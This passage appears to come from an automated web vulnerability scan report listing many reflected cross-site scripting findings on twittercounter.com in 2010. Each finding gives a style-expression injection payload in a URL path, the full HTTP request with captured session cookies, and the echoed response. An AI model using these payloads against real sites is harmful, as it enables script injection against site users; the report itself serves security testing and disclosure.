<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/justinbieberb0e74"style="x:expression(alert(1))"9504525bc79" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396e9"style%3d"x%3aexpression(alert(1))"b714c2702d7 was submitted in the REST URL parameter 1. This input was echoed as 396e9"style="x:expression(alert(1))"b714c2702d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ladygaga396e9"style%3d"x%3aexpression(alert(1))"b714c2702d7 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:26 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23662
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/ladygaga396e9"style="x:expression(alert(1))"b714c2702d7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 776e2"style%3d"x%3aexpression(alert(1))"f8836d3e837 was submitted in the REST URL parameter 1. This input was echoed as 776e2"style="x:expression(alert(1))"f8836d3e837 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /lists776e2"style%3d"x%3aexpression(alert(1))"f8836d3e837 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:16 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23662
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/lists776e2"style="x:expression(alert(1))"f8836d3e837" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ca2"style%3d"x%3aexpression(alert(1))"801a9d03825 was submitted in the REST URL parameter 1. This input was echoed as b8ca2"style="x:expression(alert(1))"801a9d03825 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /listsb8ca2"style%3d"x%3aexpression(alert(1))"801a9d03825/ HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:56 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/listsb8ca2"style="x:expression(alert(1))"801a9d03825/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e76"style%3d"x%3aexpression(alert(1))"1fc53e29816 was submitted in the REST URL parameter 1. This input was echoed as 29e76"style="x:expression(alert(1))"1fc53e29816 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bedd"style%3d"x%3aexpression(alert(1))"1c886e5df5b was submitted in the REST URL parameter 2. This input was echoed as 3bedd"style="x:expression(alert(1))"1c886e5df5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48e17"style%3d"x%3aexpression(alert(1))"8ce739382cd was submitted in the REST URL parameter 1. This input was echoed as 48e17"style="x:expression(alert(1))"8ce739382cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages48e17"style%3d"x%3aexpression(alert(1))"8ce739382cd/100/ HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:05 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23835
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages48e17"style="x:expression(alert(1))"8ce739382cd/100/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ce7"style%3d"x%3aexpression(alert(1))"75b6cede36b was submitted in the REST URL parameter 2. This input was echoed as 32ce7"style="x:expression(alert(1))"75b6cede36b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/10032ce7"style%3d"x%3aexpression(alert(1))"75b6cede36b/ HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:19 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/10032ce7"style="x:expression(alert(1))"75b6cede36b/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b062"style%3d"x%3aexpression(alert(1))"39cad8cebff was submitted in the REST URL parameter 1. This input was echoed as 4b062"style="x:expression(alert(1))"39cad8cebff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages4b062"style%3d"x%3aexpression(alert(1))"39cad8cebff/100/20 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:54 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages4b062"style="x:expression(alert(1))"39cad8cebff/100/20" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 904be"style%3d"x%3aexpression(alert(1))"960388f1dea was submitted in the REST URL parameter 2. This input was echoed as 904be"style="x:expression(alert(1))"960388f1dea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/100904be"style%3d"x%3aexpression(alert(1))"960388f1dea/20 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:59 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23720
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/100904be"style="x:expression(alert(1))"960388f1dea/20" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 170be"style%3d"x%3aexpression(alert(1))"621db842141 was submitted in the REST URL parameter 3. This input was echoed as 170be"style="x:expression(alert(1))"621db842141 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/100/20170be"style%3d"x%3aexpression(alert(1))"621db842141 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:02 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46421
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/100/20170be"style="x:expression(alert(1))"621db842141" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28488"style%3d"x%3aexpression(alert(1))"454d7a7c081 was submitted in the REST URL parameter 1. This input was echoed as 28488"style="x:expression(alert(1))"454d7a7c081 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages28488"style%3d"x%3aexpression(alert(1))"454d7a7c081/about HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:37 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23592
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages28488"style="x:expression(alert(1))"454d7a7c081/about" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6d8f"style%3d"x%3aexpression(alert(1))"aa8f384206c was submitted in the REST URL parameter 2. This input was echoed as a6d8f"style="x:expression(alert(1))"aa8f384206c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/abouta6d8f"style%3d"x%3aexpression(alert(1))"aa8f384206c HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:51 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/abouta6d8f"style="x:expression(alert(1))"aa8f384206c" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bbc7"style%3d"x%3aexpression(alert(1))"c4db51cec02 was submitted in the REST URL parameter 1. This input was echoed as 6bbc7"style="x:expression(alert(1))"c4db51cec02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages6bbc7"style%3d"x%3aexpression(alert(1))"c4db51cec02/account_check HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:08 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages6bbc7"style="x:expression(alert(1))"c4db51cec02/account_check" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d056a"style%3d"x%3aexpression(alert(1))"e3106da976c was submitted in the REST URL parameter 2. This input was echoed as d056a"style="x:expression(alert(1))"e3106da976c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/account_checkd056a"style%3d"x%3aexpression(alert(1))"e3106da976c HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:22 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/account_checkd056a"style="x:expression(alert(1))"e3106da976c" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fce58"style%3d"x%3aexpression(alert(1))"65681c6b935 was submitted in the REST URL parameter 1. This input was echoed as fce58"style="x:expression(alert(1))"65681c6b935 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pagesfce58"style%3d"x%3aexpression(alert(1))"65681c6b935/api HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:22 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23814
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pagesfce58"style="x:expression(alert(1))"65681c6b935/api" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d9c6"style%3d"x%3aexpression(alert(1))"abe1cf4d58a was submitted in the REST URL parameter 2. This input was echoed as 3d9c6"style="x:expression(alert(1))"abe1cf4d58a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/api3d9c6"style%3d"x%3aexpression(alert(1))"abe1cf4d58a HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:45 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23721
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/api3d9c6"style="x:expression(alert(1))"abe1cf4d58a" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36faf"style%3d"x%3aexpression(alert(1))"0d493ca866b was submitted in the REST URL parameter 1. This input was echoed as 36faf"style="x:expression(alert(1))"0d493ca866b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages36faf"style%3d"x%3aexpression(alert(1))"0d493ca866b/buttons HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:18:30 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23868
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages36faf"style="x:expression(alert(1))"0d493ca866b/buttons" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c25d"style%3d"x%3aexpression(alert(1))"385babb0cec was submitted in the REST URL parameter 2. This input was echoed as 1c25d"style="x:expression(alert(1))"385babb0cec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/buttons1c25d"style%3d"x%3aexpression(alert(1))"385babb0cec HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:18:39 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23857
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/buttons1c25d"style="x:expression(alert(1))"385babb0cec" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5a36"style%3d"x%3aexpression(alert(1))"31ae2b6f51f was submitted in the REST URL parameter 1. This input was echoed as d5a36"style="x:expression(alert(1))"31ae2b6f51f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pagesd5a36"style%3d"x%3aexpression(alert(1))"31ae2b6f51f/dummyvalue HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:57 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pagesd5a36"style="x:expression(alert(1))"31ae2b6f51f/dummyvalue" /> ...[SNIP]...
